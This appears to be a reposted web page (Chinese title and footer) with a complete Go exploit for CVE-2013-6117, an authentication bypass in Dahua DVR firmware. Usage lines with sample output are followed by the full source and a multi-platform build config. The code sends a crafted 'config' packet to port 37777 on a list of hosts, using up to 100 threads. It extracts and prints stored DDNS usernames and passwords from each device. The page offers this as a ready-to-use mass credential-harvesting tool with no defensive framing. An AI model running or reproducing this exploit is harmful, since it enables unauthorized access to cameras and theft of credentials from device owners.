# CVE-2013-6117 Dahua DVR 2.608.0000.0 and 2.608.GV00.0 身份驗證繞過漏洞
==Usage==
$ ./CVE-2013-6117 -h Options: -h, --help display help information -f, --filename File containing list of IP addresses -t, --target Target IP -n, --threads No of concurrent threads (default: 100)
$ ./CVE-2013-6117 -f hostfile.txt 1.2.4.4|name.no-ip.org:80|username|password
$ ./CVE-2013-6117 -t 1.2.3.4 1.2.4.4|name.no-ip.org:80|username|password
==CVE-2013-6117.go==
package main import ( "net" "os" "strings" "fmt" "sync" "bufio" "time" "github.com/mkideal/cli" ) func readLines(path string) ([]string, error) { file, err := os.Open(path) if err != nil { return nil, err } defer file.Close() var lines []string scanner := bufio.NewScanner(file) for scanner.Scan() { lines = append(lines, scanner.Text()) } return lines, scanner.Err() } func getData(servAddr string,data string) { tmpResult:=data if strings.Contains(tmpResult, "&&G4-IP DDNS&&"){ s := strings.Split(tmpResult, "&&G4-IP DDNS&&") if len(s)>0 { s := strings.Split(tmpResult, "&&G4-IP DDNS&&")[1] s1 := strings.Split(s, "&&") tmpip:=s1[0] tmpport:=s1[1] ddns:=tmpip+":"+tmpport tmpusername:=s1[3] tmppassword:=s1[4] if len(tmpusername)>0 { fmt.Println(servAddr+"|"+ddns+"|"+tmpusername+"|"+tmppassword) } } } if strings.Contains(tmpResult, "&&NO-IP DDNS&&"){ s := strings.Split(tmpResult, "&&NO-IP DDNS&&") if len(s)>0 { s := strings.Split(tmpResult, "&&NO-IP DDNS&&")[1] s1 := strings.Split(s, "&&") tmpip:=s1[0] tmpport:=s1[1] ddns:=tmpip+":"+tmpport tmpusername:=s1[3] tmppassword:=s1[4] if len(tmpusername)>0 { fmt.Println(servAddr+"|"+ddns+"|"+tmpusername+"|"+tmppassword) } } } if strings.Contains(tmpResult, "&&Dyndns DDNS&&"){ s := strings.Split(tmpResult, "&&Dyndns DDNS&&") if len(s)>0 { s := strings.Split(tmpResult, "&&Dyndns DDNS&&")[1] s1 := strings.Split(s, "&&") tmpip:=s1[0] tmpport:=s1[1] ddns:=tmpip+":"+tmpport tmpusername:=s1[3] tmppassword:=s1[4] if len(tmpusername)>0 { fmt.Println(servAddr+"|"+ddns+"|"+tmpusername+"|"+tmppassword) } } } } func connect(urlChan chan string) { for servAddr := range urlChan { strEcho := "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00\x8c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" tcpAddr, err := net.ResolveTCPAddr("tcp", servAddr+":37777") if err == nil { var timeoutSec=5 timeout := time.Duration(time.Duration(timeoutSec) * time.Second) d := net.Dialer{Timeout: timeout} conn, err := d.Dial("tcp", servAddr+":37777") if err == nil { _, err = conn.Write([]byte(strEcho)) if err == nil { reply := make([]byte, 1024) _, err = conn.Read(reply) if err == nil { getData(servAddr,string(reply)) } } conn.Close() } } _=tcpAddr } } type argT struct { cli.Helper Filename string `cli:"f,filename" usage:"File containing list of IP addresses"` Targetip string `cli:"t,target" usage:"Target IP"` Threads int `cli:"n,threads" usage:"No of concurrent threads (default: 100)"` } func main() { var workersCount=100 var contentList []string cli.Run(new(argT), func(ctx *cli.Context) error { argv := ctx.Argv().(*argT) if len(argv.Filename)>0 { lines, err2 := readLines(argv.Filename) if err2==nil { for _, v := range lines { v=strings.TrimSpace(v) if len(v)>0 { contentList = append(contentList, v) } } } else { fmt.Println(err2) } _ = err2 } if argv.Threads>0 { workersCount=argv.Threads } if len(argv.Targetip)>0 { contentList = append(contentList, argv.Targetip) } return nil }) urlChan := make(chan string) var wg1 sync.WaitGroup wg1.Add(workersCount) for i := 0; i < workersCount; i++ { go func() { defer wg1.Done() connect(urlChan) }() } completed := 0 for _, each := range contentList { urlChan <- each completed++ } close(urlChan) wg1.Wait() }
==goreleaser.yml==
build: main: ./CVE-2013-6117.go goos: - linux - darwin - windows goarch: - 386 - amd64 - arm - arm64 brew: github: owner: milo2012 name: homebrew-tap folder: Formula
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容